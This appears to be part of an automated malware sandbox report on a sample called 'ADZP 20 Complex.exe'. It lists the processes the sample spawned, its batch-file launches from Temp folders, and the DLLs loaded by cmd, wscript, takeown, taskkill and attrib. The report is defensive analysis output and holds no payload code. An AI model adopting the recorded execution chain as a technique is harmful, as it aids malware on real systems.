                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
